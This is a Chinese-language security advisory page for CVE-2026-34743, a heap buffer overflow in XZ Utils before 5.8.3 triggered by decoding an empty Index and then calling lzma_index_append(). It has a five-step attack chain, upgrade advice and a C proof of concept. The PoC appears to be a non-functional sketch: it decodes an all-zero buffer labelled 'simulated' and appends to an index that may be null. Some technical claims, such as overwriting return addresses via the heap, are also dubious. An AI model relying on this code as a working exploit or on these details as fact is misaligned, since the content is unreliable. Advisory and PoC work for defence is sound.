CVE-2026-34743 CVSS 5.3 中危

CVE-2026-34743 XZ Utils缓冲区溢出漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34743

漏洞类型

缓冲区溢出

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

XZ Utils

漏洞概述

XZ Utils是一款广泛使用的数据压缩库及命令行工具。在5.8.3版本之前，该组件存在一个安全漏洞。当使用lzma_index_decoder()函数解码一个不包含任何记录的Index时，生成的lzma_index对象会处于一种异常状态。如果随后调用lzma_index_append()函数，由于内存分配不足，会导致缓冲区溢出。攻击者可利用此漏洞造成拒绝服务或潜在的代码执行。该问题已在5.8.3版本中修复。

技术细节

该漏洞源于XZ Utils库中lzma_index_decoder函数的逻辑缺陷。当解码器处理一个不包含记录的Index时，未能正确初始化或更新内部状态变量，导致lzma_index结构体中的大小计数器与实际分配的内存不匹配。随后，若代码调用lzma_index_append()向该索引添加新记录，函数会基于错误的计数器计算所需内存，导致分配过小的缓冲区。在写入数据时，程序会越过缓冲区边界，引发堆溢出。由于攻击向量（AV:N）和网络可达性，攻击者可以通过特制的压缩文件触发此漏洞。这种内存损坏可能导致应用程序崩溃（拒绝服务），在特定条件下，攻击者可能利用此溢出覆盖关键数据结构或返回地址，从而实现任意代码执行，对系统安全构成严重威胁。

攻击链分析

STEP 1

步骤1

攻击者构造一个特制的XZ压缩文件，其中包含一个没有任何记录的Index字段。

STEP 2

步骤2

攻击者诱导受害者使用存在漏洞的XZ Utils（版本<5.8.3）处理该恶意文件。

STEP 3

步骤3

受害者的系统调用lzma_index_decoder()解码该Index，导致lzma_index对象处于异常状态。

STEP 4

步骤4

程序随后调用lzma_index_append()尝试向索引添加数据。

STEP 5

步骤5

由于内存分配计算错误，发生缓冲区溢出，导致服务崩溃或潜在代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-34743
 * This code demonstrates the buffer overflow vulnerability in XZ Utils < 5.8.3.
 * Triggering the bug involves decoding an empty index and then appending data.
 */

#include <stdio.h>
#include <stdint.h>
#include <lzma.h>

int main(void) {
    lzma_stream strm = LZMA_STREAM_INIT;
    lzma_index *i = NULL;
    
    // Initialize index decoder
    // In a real exploit, 'in_buf' would contain specific bytes representing an empty index
    uint8_t in_buf[1024] = {0}; 
    
    if (lzma_index_decoder(&strm, &i, UINT64_MAX) != LZMA_OK) {
        fprintf(stderr, "Decoder initialization failed\n");
        return 1;
    }

    // Process the input to trigger the empty index state
    strm.next_in = in_buf;
    strm.avail_in = sizeof(in_buf);
    
    // Decode the stream (simulated)
    // If the stream represents an index with 0 records, lzma_index state is corrupted
    lzma_code(&strm, LZMA_FINISH);

    // The vulnerable call: lzma_index_append
    // Because the previous state was corrupted, this allocates too little memory
    // and causes a buffer overflow when writing.
    lzma_ret ret = lzma_index_append(i, NULL, 0, 1000);
    
    if (ret != LZMA_OK) {
        printf("Append failed (expected if crash didn't occur): %d\n", ret);
    } else {
        printf("PoC executed. Memory corruption likely occurred if version < 5.8.3\n");
    }

    lzma_end(&strm);
    return 0;
}

影响范围

XZ Utils < 5.8.3

防御指南

临时缓解措施

建议用户尽快将XZ Utils更新至5.8.3版本。如果无法立即升级，应限制对不可信压缩文件的处理，并在沙箱环境中解压文件以减少潜在影响。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表